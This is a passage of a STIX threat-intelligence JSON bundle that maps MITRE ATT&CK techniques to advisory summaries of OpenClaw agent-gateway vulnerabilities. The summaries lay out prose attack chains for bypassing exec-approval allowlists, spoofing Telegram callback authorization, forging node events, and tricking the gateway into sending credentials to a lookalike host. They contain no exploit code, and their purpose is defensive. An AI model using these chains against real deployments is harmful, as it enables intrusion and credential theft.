          "url": "https://attack.mitre.org/techniques/T1098"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--e5e8c2ad-6b0d-51da-b7b2-1b2d5b59894b",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--a6b1e6d4-7656-584d-a610-473fec552889",
      "target_ref": "attack-pattern--5ee3ab13-ad3c-534b-b2c1-7213321a2238"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--03c83a54-7fcd-5e1a-99d5-88d0bbd8fb19",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Exploitation for Privilege Escalation",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1068",
          "url": "https://attack.mitre.org/techniques/T1068"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--e9e9d04f-7ab4-5611-aa18-fcac307fd15b",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--a6b1e6d4-7656-584d-a610-473fec552889",
      "target_ref": "attack-pattern--03c83a54-7fcd-5e1a-99d5-88d0bbd8fb19"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--a6b1e6d4-7656-584d-a610-473fec552889",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "OpenClaw Device Pairing Vulnerability Allows Unauthorized Device Enrollment",
      "description": "## Overview\n\nA significant vulnerability has been identified in the `openclaw` project, specifically within its bundled device-pair plugin, affecting versions prior to `2026.5.4`. This flaw allows existing, authenticated users who are not designated as owners, administrators, or possessing explicit pairing scope, to exploit the chat agent's `/pair` command endpoint. By sending specific chat commands, these non-owner users can illicitly generate and retrieve device-pairing bootstrap codes. An attacker can then leverage these codes to enroll new devices with full \"operator/node capabilities\" into the `openclaw` system. This results in persistent unauthorized access and control over the environment. The issue is critical for deployments where the `device-pair` plugin is enabled and chat channels (e.g., Telegram, Discord, Slack) are configured to allow non-owner command execution. This vulnerability does not affect unauthenticated users, as it requires prior authorized access to a chat channel.\n\n## Attack Chain\n\n1.  **Initial Access (Prerequisite)**: An attacker gains legitimate, non-owner access to a chat channel (e.g., Telegram, Discord, Slack) that is configured to interact with an `openclaw` agent.\n2.  **Command Execution**: The attacker sends a chat command to the `openclaw` agent, specifically targeting the exposed `/pair` command surface.\n3.  **Vulnerability Exploitation**: The `openclaw` agent, due to the vulnerability in versions prior to `2026.5.4`, processes the `/pair` command from the non-owner user, despite their lack of explicit pairing privileges.\n4.  **Bootstrap Code Generation**: The vulnerable agent generates and issues a device-pairing bootstrap code, transmitting it to the attacker via the chat channel.\n5.  **Device Enrollment**: The attacker uses the acquired bootstrap code before its expiry to enroll a new, unauthorized device with the `openclaw` system.\n6.  **Privilege Gain \u0026 Persistence**: The newly enrolled device is automatically granted \"operator/node capabilities\" and establishes \"persistent credentials,\" effectively escalating the attacker's access and control within the `openclaw` environment.\n\n## Impact\n\nSuccessful exploitation of this vulnerability allows an unauthorized individual, who already has basic chat access, to gain significant control over the `openclaw` environment. By enrolling devices with operator/node capabilities, the attacker can achieve persistent access, potentially leading to data manipulation, unauthorized operations, or further compromise of integrated systems. This issue primarily impacts organizations using `openclaw` with chat agent integrations (like Telegram, Discord, or Slack) where the `device-pair` plugin is enabled and command access is not strictly limited to trusted personnel. The impact is the establishment of a backdoor-like persistence mechanism via the unauthorized enrollment of a new device.\n\n## Recommendation\n\n*   Immediately upgrade `openclaw` to version `2026.5.4` or later to remediate the vulnerability.\n*   Review all currently paired devices within your `openclaw` deployment and remove any unexpected or unauthorized entries to revoke persistent access gained through this vulnerability.\n*   In shared chat channels where the `openclaw` agent is configured, limit command access to only those users who are explicitly authorized and trusted to manage device pairing, as outlined in the \"Mitigations\" section of the advisory.\n",
      "published": "2026-07-03T12:02:47Z",
      "labels": [
        "vulnerability",
        "application",
        "privilege-escalation",
        "persistence",
        "npm"
      ],
      "object_refs": [
        "attack-pattern--5ee3ab13-ad3c-534b-b2c1-7213321a2238",
        "attack-pattern--03c83a54-7fcd-5e1a-99d5-88d0bbd8fb19"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://github.com/advisories/GHSA-xr4f-mjxj-w6w5"
        }
      ],
      "confidence": 80
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Command and Scripting Interpreter",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1059",
          "url": "https://attack.mitre.org/techniques/T1059"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--c87d8487-c4ce-5d92-b7b8-6ba5b1b25ad3",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--9bf08246-cec8-5b5f-804a-3099b557e74c",
      "target_ref": "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--9bf08246-cec8-5b5f-804a-3099b557e74c",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "OpenClaw Workspace .env Homebrew Executable Override Vulnerability (CVE-2026-53819)",
      "description": "## Overview\n\nThe OpenClaw platform is affected by CVE-2026-53819, a high-severity vulnerability enabling a malicious `.env` file in a repository to manipulate the Homebrew executable selection during skill installation flows. Published by GHSA on July 2, 2026, this flaw permits the OpenClaw install helper to use an attacker-controlled Homebrew-compatible binary instead of the legitimate one. This occurs when a trusted operator opens an affected workspace and initiates a skill installation. The vulnerability, present in OpenClaw versions prior to 2026.5.27, affects macOS and Linux systems and poses a significant risk for arbitrary code execution, bypassing established security controls and potentially compromising the operator's environment.\n\n## Attack Chain\n\n1.  An attacker crafts a malicious repository that includes a `.env` file designed to alter environment variables that influence Homebrew's path resolution.\n2.  The attacker socially engineers a trusted OpenClaw operator to clone and open this malicious repository within their development workspace.\n3.  The trusted operator initiates a skill install flow within the newly opened, compromised workspace.\n4.  During the install process, the OpenClaw install helper parses the malicious `.env` file, causing it to load an incorrect or attacker-controlled path for the Homebrew executable.\n5.  Instead of executing the legitimate Homebrew binary, the system invokes an attacker-controlled Homebrew-compatible executable, which was likely bundled within the malicious repository.\n6.  The attacker-controlled executable runs with the operator's privileges, achieving arbitrary code execution on the host system.\n7.  This execution could lead to system compromise, data exfiltration, or further lateral movement within the network.\n\n## Impact\n\nSuccessful exploitation of CVE-2026-53819 could allow an attacker to run arbitrary code on a trusted operator's system, leading to full system compromise. The practical impact depends on the specific configuration of the operator's environment and the attacker's payload. If lower-trust input can reach the affected path, it increases the likelihood and severity of compromise. This vulnerability could be leveraged for initial access, privilege escalation, or establishing persistence within targeted development environments, potentially affecting intellectual property or critical infrastructure if operators with elevated access are targeted.\n\n## Recommendation\n\n*   Immediately patch OpenClaw to version `2026.5.27` or newer to remediate CVE-2026-53819.\n*   Avoid running skill install flows from untrusted workspaces until all OpenClaw instances are updated to the patched version `2026.5.27`.\n*   As a general hardening measure, keep channel and tool allowlists narrow, as noted in the GHSA reference.\n*   Disable the affected feature when it is not needed to reduce the attack surface for CVE-2026-53819.\n",
      "published": "2026-07-03T12:01:45Z",
      "labels": [
        "vulnerability",
        "code-execution",
        "homebrew",
        "supply-chain",
        "macos",
        "linux"
      ],
      "object_refs": [
        "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://github.com/advisories/GHSA-8wg3-5mcm-fjq8"
        }
      ],
      "confidence": 80
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--e4ab0b7d-8be8-5d44-bd27-4aa1d2d6df70",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "OpenClaw Vulnerability Allows Unintended Artifact Loading (CVE-2026-53813)",
      "description": "## Overview\n\nA high-severity vulnerability, CVE-2026-53813, has been identified in OpenClaw (npm/openclaw package) affecting versions up to and including 2026.4.24. This flaw, dubbed \"Fake package roots,\" permits a local package root resolution path, influenced by workspace state, to select and load memory-core artifacts from an unintended local location rather than the intended bundled artifact root. The practical impact hinges on the operator's specific configuration and the ability for lower-trust input to reach the vulnerable path. While OpenClaw generally operates on a trusted-operator model, this specific feature, if enabled and reachable, could bypass assumptions about artifact integrity. The issue was disclosed via GHSA on July 2, 2026.\n\n## Attack Chain\n\nThe provided source describes a vulnerability rather than a detailed, observed attack chain. Exploitation would likely involve an attacker providing malicious or crafted input to a Gateway operator's workspace, leveraging the \"fake package root\" vulnerability (CVE-2026-53813) to redirect artifact loading. The exact steps for achieving this depend on the specific configuration and how \"lower-trust input\" can be introduced into the environment. No specific steps for attacker actions are outlined in the advisory.\n\n## Impact\n\nSuccessful exploitation of CVE-2026-53813 could lead to the loading of arbitrary, unintended memory-core artifacts from a local file path. The actual damage incurred is highly dependent on the operator's environment and the nature of the unintended artifact loaded. If an attacker can inject malicious code via this mechanism, it could result in code execution within the context of the affected OpenClaw process, leading to data compromise, system manipulation, or further network lateral movement.\n\n## Recommendation\n\n*   Patch OpenClaw (npm/openclaw) to version `2026.4.25` or newer immediately to remediate CVE-2026-53813.\n*   As a mitigation for CVE-2026-53813, run memory-core flows only from trusted workspaces.\n*   Keep channel and tool allowlists narrow to restrict potential attack surfaces as recommended in the advisory.\n*   Avoid sharing a single OpenClaw Gateway between mutually untrusted users.\n*   Disable the affected feature within OpenClaw if it is not explicitly required for operations.\n",
      "published": "2026-07-03T12:00:51Z",
      "labels": [
        "vulnerability",
        "supply-chain",
        "npm",
        "node.js",
        "openclaw"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://github.com/advisories/GHSA-v8cx-933x-r976"
        }
      ],
      "confidence": 80
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--74cc743b-b367-5a04-aca7-6abfd4d685e8",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "OpenClaw Vulnerability Allows Execution Revalidation Bypass (CVE-2026-53806)",
      "description": "## Overview\n\nA significant vulnerability, identified as CVE-2026-53806, has been discovered in npm/openclaw versions up to `2026.5.7`. This flaw allows attackers to bypass a critical security control known as \"exec revalidation\" by presenting specially crafted input containing combined POSIX shell options. The core issue lies in how OpenClaw parses these combined shell flags, leading to a discrepancy between approval-time and execution-time shell option interpretations. This misinterpretation can allow inline shell content, which should otherwise be blocklisted or explicitly approved, to be executed without proper validation. The practical impact is severe, potentially enabling remote code execution, especially if untrusted user input can reach the affected execution path within the OpenClaw application. Defenders should prioritize patching and applying mitigations to prevent exploitation.\n\n## Attack Chain\n\n1.  **Initial Access / Input Delivery**: An attacker obtains the ability to provide user-controlled input to an OpenClaw application interface where the affected feature is enabled and reachable. This input could originate from a lower-trust source.\n2.  **Crafted Input with Combined Shell Options**: The attacker crafts malicious input that includes combined POSIX shell options, designed to exploit the parsing vulnerability within OpenClaw.\n3.  **Application Processing**: The OpenClaw application receives and begins to process the crafted input, which contains the malicious shell content alongside the confusing combined options.\n4.  **Exec Revalidation Confusion**: During the \"exec revalidation\" process, OpenClaw misinterprets the combined shell options, causing a discrepancy between its initial approval-time parsing and the actual execution-time parsing.\n5.  **Allowlist Bypass**: Due to the confusion, the security mechanism intended to validate and allowlist/blocklist shell content is bypassed, failing to correctly identify the malicious inline shell content.\n6.  **Unauthorized Shell Content Execution**: The previously unapproved or blocklisted inline shell content is executed on the underlying system, leveraging the permissions of the OpenClaw application.\n7.  **Arbitrary Command Execution**: The executed shell content performs arbitrary commands, potentially leading to system compromise, data manipulation, or further lateral movement within the environment.\n\n## Impact\n\nWhen this vulnerability, CVE-2026-53806, is exploited, it allows an attacker to execute arbitrary inline shell content without the intended allowlist validation. The practical impact on an organization is highly dependent on the specific configuration of the OpenClaw operator and whether input from lower-trust sources can reach the vulnerable execution path. If successfully exploited, attackers can bypass security controls designed to prevent unauthorized command execution, potentially leading to remote code execution (RCE), full system compromise, data exfiltration, or denial-of-service, depending on the attacker's executed commands.\n\n## Recommendation\n\n*   **Patch CVE-2026-53806 immediately** by upgrading npm/openclaw to version `2026.5.12` or later.\n*   **Avoid combined shell option forms** in allowlisted commands within your OpenClaw configuration until the system is patched against CVE-2026-53806.\n*   **Disable the affected feature** within OpenClaw if it is not strictly needed for operational purposes, as a general hardening measure.\n*   **Keep channel and tool allowlists narrow** in OpenClaw configurations, permitting only essential commands and trusted sources.\n*   **Avoid sharing a single OpenClaw Gateway** between mutually untrusted users to limit the blast radius of potential exploitation of CVE-2026-53806.\n",
      "published": "2026-07-03T11:59:40Z",
      "labels": [
        "vulnerability",
        "rce",
        "shell",
        "bypass",
        "code-execution",
        "linux",
        "macos"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://github.com/advisories/GHSA-vxx3-6hc9-7cc3"
        }
      ],
      "confidence": 80
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--03c83a54-7fcd-5e1a-99d5-88d0bbd8fb19",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Exploitation for Privilege Escalation",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1068",
          "url": "https://attack.mitre.org/techniques/T1068"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--7b1928ac-8678-5ddd-a370-d7e2e7d9c5fb",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--1d28928f-a776-5ba1-a83c-6df9e6670206",
      "target_ref": "attack-pattern--03c83a54-7fcd-5e1a-99d5-88d0bbd8fb19"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--cab43178-fae3-52ac-a29f-a095c60026fa",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Masquerading: Match Legitimate Name or Location",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1036.005",
          "url": "https://attack.mitre.org/techniques/T1036/005"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--5ba43d57-9f07-5226-9840-6921cb573bcd",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--1d28928f-a776-5ba1-a83c-6df9e6670206",
      "target_ref": "attack-pattern--cab43178-fae3-52ac-a29f-a095c60026fa"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--1d28928f-a776-5ba1-a83c-6df9e6670206",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "OpenClaw Node Forgery via Missing Provenance Check (CVE-2026-53816)",
      "description": "## Overview\n\nA critical vulnerability, tracked as CVE-2026-53816, has been identified in the npm/openclaw package, affecting all versions prior to `2026.5.18`. This flaw allows an attacker who has already gained control of a paired OpenClaw node to bypass security checks and forge `exec` lifecycle events. OpenClaw nodes typically send these lifecycle events to a central gateway. However, due to an insufficient provenance check in affected versions, the gateway accepts these forged events as legitimate execution results. This deception can lead the target session to process attacker-controlled data, exposing capabilities that the compromised node should not possess. This issue primarily impacts deployments where nodes can send crafted `node.event` messages to the gateway and the target agent/session processes exec lifecycle events.\n\n## Attack Chain\n\n1.  An attacker gains control over an already paired OpenClaw node within the targeted environment.\n2.  The compromised paired node crafts a malicious `node.event` message containing forged `exec` lifecycle event data.\n3.  The forged event data is designed to mimic a legitimate `system.run` request or other authorized execution.\n4.  The compromised node sends this crafted `node.event` message to the OpenClaw gateway.\n5.  Due to a missing provenance check, the OpenClaw gateway accepts the forged `exec` lifecycle event without validating its origin or authorization.\n6.  The gateway processes the attacker-supplied event data as if it were a legitimate execution result from an authorized `system.run` request.\n7.  This process steers the target session into an exec-event path, exposing unauthorized capabilities to the compromised node.\n8.  The attacker achieves privilege escalation or unauthorized control over functionality that the node's reduced surface should not have provided.\n\n## Impact\n\nThe successful exploitation of CVE-2026-53816 enables a malicious or compromised OpenClaw node to gain unauthorized capabilities on the OpenClaw gateway and associated target sessions. By making the gateway treat attacker-supplied event data as legitimate execution results, the vulnerability effectively elevates the privileges of the compromised node beyond its intended scope. While it does not allow an unauthenticated caller to directly reach the gateway, it poses a significant threat in environments where an OpenClaw node has already been breached, potentially leading to broader system compromise and unauthorized data access or manipulation. Organizations with affected versions are at risk if any of their paired nodes are compromised.\n\n## Recommendation\n\n*   Upgrade to `openclaw@2026.5.18` or later immediately to patch CVE-2026-53816.\n*   Ensure that all paired OpenClaw nodes originate from trusted and secured environments.\n*   Implement a process to remove and re-pair any OpenClaw nodes that are suspected of being compromised.\n",
      "published": "2026-07-03T11:58:42Z",
      "labels": [
        "vulnerability",
        "privilege-escalation",
        "server-side",
        "npm"
      ],
      "object_refs": [
        "attack-pattern--03c83a54-7fcd-5e1a-99d5-88d0bbd8fb19",
        "attack-pattern--cab43178-fae3-52ac-a29f-a095c60026fa"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://github.com/advisories/GHSA-3c6j-hq33-3jv4"
        },
        {
          "source_name": "reference",
          "url": "CVE-2026-53816"
        }
      ],
      "confidence": 80
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--0856bd82-6dcb-584e-bbac-9f484aa79d34",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Indicator Removal",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1070",
          "url": "https://attack.mitre.org/techniques/T1070"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--aa9094f8-204b-5781-9286-8d6d6edc33e0",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--4b03f674-9dcf-5b58-8664-a2e959332d62",
      "target_ref": "attack-pattern--0856bd82-6dcb-584e-bbac-9f484aa79d34"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Command and Scripting Interpreter",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1059",
          "url": "https://attack.mitre.org/techniques/T1059"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--bb336555-b093-580d-b2f8-2ddbe624b75d",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--4b03f674-9dcf-5b58-8664-a2e959332d62",
      "target_ref": "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--2b9dc711-e202-51c6-9b7d-de4286c4d846",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Abuse Elevation Control Mechanism",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1548",
          "url": "https://attack.mitre.org/techniques/T1548"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--91c17cdb-8d38-54e0-8df6-4641eb1c26d9",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--4b03f674-9dcf-5b58-8664-a2e959332d62",
      "target_ref": "attack-pattern--2b9dc711-e202-51c6-9b7d-de4286c4d846"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--4b03f674-9dcf-5b58-8664-a2e959332d62",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "OpenClaw Telegram Callback Authorization Bypass (GHSA-w5ww-7chg-mxcq)",
      "description": "## Overview\n\nA critical vulnerability (GHSA-w5ww-7chg-mxcq) exists in OpenClaw, affecting versions up to `2026.5.5`, which allows an authorization bypass in its Telegram interactive callback functionality. Discovered and published on 2026-07-02, this flaw permits a malicious Telegram user to invoke a callback that marks itself as an authorized sender, effectively circumventing the `commands.allowFrom` restriction. This means commands intended for execution only by trusted users can be triggered by unauthorized individuals. The vulnerability primarily impacts OpenClaw Gateway operators who have Telegram interactive callbacks enabled, potentially leading to unintended command execution and system compromise. Organizations using OpenClaw should prioritize patching to version `2026.5.6` or later to prevent unauthorized command invocation. The risk is high given the potential for unauthorized control over the Gateway through a simple callback.\n\n## Attack Chain\n\n1. Attacker identifies an OpenClaw Gateway instance that exposes Telegram interactive callbacks.\n2. Attacker crafts a specialized Telegram interactive callback request, targeting a specific command.\n3. The crafted callback is sent to the vulnerable OpenClaw Gateway's Telegram interface.\n4. OpenClaw Gateway receives and processes the interactive callback.\n5. Due to the vulnerability (GHSA-w5ww-7chg-mxcq), the internal logic incorrectly marks the callback sender as authorized.\n6. The `commands.allowFrom` check, which should restrict command execution based on sender identity, is bypassed.\n7. The attacker's command, embedded within or triggered by the callback, is executed by the OpenClaw Gateway.\n8. Unauthorized command execution leads to the attacker achieving their objective, such as data manipulation, system configuration changes, or further compromise.\n\n## Impact\n\nIf exploited, this vulnerability could trigger command behavior outside the configured Telegram sender allowlist, leading to unauthorized actions on the OpenClaw Gateway. The practical impact is contingent upon the specific configuration of the operator and the sensitivity of commands accessible via Telegram. While no specific victim count or sectors are mentioned, any organization utilizing vulnerable OpenClaw versions with Telegram interactive callbacks enabled faces a high risk of unauthorized control over their Gateway, potentially leading to data exfiltration, service disruption, or further network penetration.\n\n## Recommendation\n\n*   Upgrade `npm/openclaw` to version `2026.5.6` or later to remediate the vulnerability described in this brief.\n*   As a temporary mitigation, restrict Telegram command callbacks to trusted chats until `npm/openclaw` can be patched, as recommended by the advisory.\n*   Disable the interactive callbacks feature for `npm/openclaw` if it is not strictly needed, reducing the attack surface.\n",
      "published": "2026-07-03T11:57:08Z",
      "labels": [
        "authorization-bypass",
        "telegram",
        "callback",
        "vulnerability",
        "npm"
      ],
      "object_refs": [
        "attack-pattern--0856bd82-6dcb-584e-bbac-9f484aa79d34",
        "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb",
        "attack-pattern--2b9dc711-e202-51c6-9b7d-de4286c4d846"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://github.com/advisories/GHSA-w5ww-7chg-mxcq"
        }
      ],
      "confidence": 80
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--c70a2e65-c065-55f2-9e9e-0ff6d591826b",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Impair Defenses",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1562",
          "url": "https://attack.mitre.org/techniques/T1562"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--d028d3c6-1893-5864-97c0-d01ae7ba2348",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--03ad1da3-873f-5b8d-8ea6-7e9fc5aab0c8",
      "target_ref": "attack-pattern--c70a2e65-c065-55f2-9e9e-0ff6d591826b"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--dc5e4f03-1094-5965-8de6-b9af854b1653",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Unsecured Credentials",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1552",
          "url": "https://attack.mitre.org/techniques/T1552"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--effc7657-1fda-5c88-ac1a-575b0c0bfd1e",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--03ad1da3-873f-5b8d-8ea6-7e9fc5aab0c8",
      "target_ref": "attack-pattern--dc5e4f03-1094-5965-8de6-b9af854b1653"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--03ad1da3-873f-5b8d-8ea6-7e9fc5aab0c8",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "OpenClaw Trusted Retry Endpoint Hostname Bypass",
      "description": "## Overview\n\nA significant vulnerability has been identified in `OpenClaw`'s trusted retry endpoint checks, published on July 2, 2026. This flaw permits attackers to craft URLs for these endpoints using hostname prefixes that mimic legitimate trusted hosts, thereby bypassing internal validation mechanisms. When `OpenClaw` instances have this feature enabled and are exposed to lower-trust input, they can be coerced into sending sensitive authentication material (such as API keys or tokens) to attacker-controlled infrastructure. This risk highlights the critical importance of secure configuration and timely patching, as the compromise of authentication credentials could lead to unauthorized access, data exfiltration, or further lateral movement within an affected environment. The first stable patched version addressing this issue is `2026.5.7`.\n\n## Attack Chain\n\n1.  Attacker identifies an `OpenClaw` instance where the vulnerable retry endpoint feature is enabled and can process input from lower-trust sources.\n2.  Attacker crafts a malicious URL designed to bypass validation, utilizing a hostname prefix that closely resembles a legitimate trusted host (e.g., `trusted.example.com.malicious.net`).\n3.  The crafted URL is submitted to the `OpenClaw` instance through an accessible pathway, such as an API endpoint or user-controlled input field.\n4.  `OpenClaw`'s vulnerable trusted retry endpoint validation logic incorrectly identifies the attacker's URL prefix as a match for a legitimate trusted host due to the flawed matching algorithm.\n5.  `OpenClaw` initiates an outbound network connection to the attacker-controlled domain embedded within the crafted URL.\n6.  During the outbound connection, `OpenClaw` inadvertently includes sensitive authentication material (e.g., API keys, session tokens, internal credentials) intended for the genuine trusted host.\n7.  The attacker's server receives the incoming connection from the `OpenClaw` instance and captures the exfiltrated authentication material.\n8.  The attacker then uses the compromised authentication material to gain unauthorized access to other systems or exfiltrate sensitive data.\n\n## Impact\n\nThe primary impact of this vulnerability is the potential exfiltration of sensitive authentication material, such as API keys, session tokens, or other credentials. If exploited, `OpenClaw` instances could unwittingly send these materials to attacker-controlled endpoints, leading to unauthorized access to connected services or systems. The practical consequences for an organization depend heavily on the specific configuration of the `OpenClaw` instance, including whether the affected feature is enabled and reachable by untrusted input, and the criticality of the authentication material being mishandled. This could ultimately result in data breaches, further lateral movement by attackers, or unauthorized control over critical applications.\n\n## Recommendation\n\n*   Upgrade `OpenClaw` to version `2026.5.7` or later immediately to apply the patch addressing the hostname prefix bypass vulnerability, referenced in the affected products `OpenClaw (\u003c 2026.5.7)`.\n*   If immediate patching is not possible, implement strict host validation for retry endpoint configurations, ensuring exact trusted origins are specified and not just prefixes, as described by the vulnerability in this brief.\n*   Review and disable the affected `OpenClaw` retry endpoint feature if it is not explicitly required in your environment to eliminate the attack surface.\n*   Audit `OpenClaw` configurations to ensure that channel and tool allowlists are narrowly defined, preventing lower-trust inputs from reaching sensitive configuration pathways.\n",
      "published": "2026-07-03T11:56:21Z",
      "labels": [
        "vulnerability",
        "server-side-request-forgery",
        "web-application"
      ],
      "object_refs": [
        "attack-pattern--c70a2e65-c065-55f2-9e9e-0ff6d591826b",
        "attack-pattern--dc5e4f03-1094-5965-8de6-b9af854b1653"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://github.com/advisories/GHSA-77q5-rr5v-x43q"
        }
      ],
      "confidence": 80
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "T1059",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1059",
          "url": "https://attack.mitre.org/techniques/T1059"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--7744f117-9e95-5e3a-a92c-ba63b584c488",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--e61b5787-216a-5080-ba72-93dd06533ad2",
      "target_ref": "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--9d6de9ca-c127-5a88-a5f8-975f04ba0874",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "T1136",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1136",
          "url": "https://attack.mitre.org/techniques/T1136"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--9399a5cf-994d-5614-8724-e637402ed034",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--e61b5787-216a-5080-ba72-93dd06533ad2",
      "target_ref": "attack-pattern--9d6de9ca-c127-5a88-a5f8-975f04ba0874"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--e61b5787-216a-5080-ba72-93dd06533ad2",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "MediaWiki Maps Stored XSS via display_map `overlays` Parameter (CVE-2026-52854)",
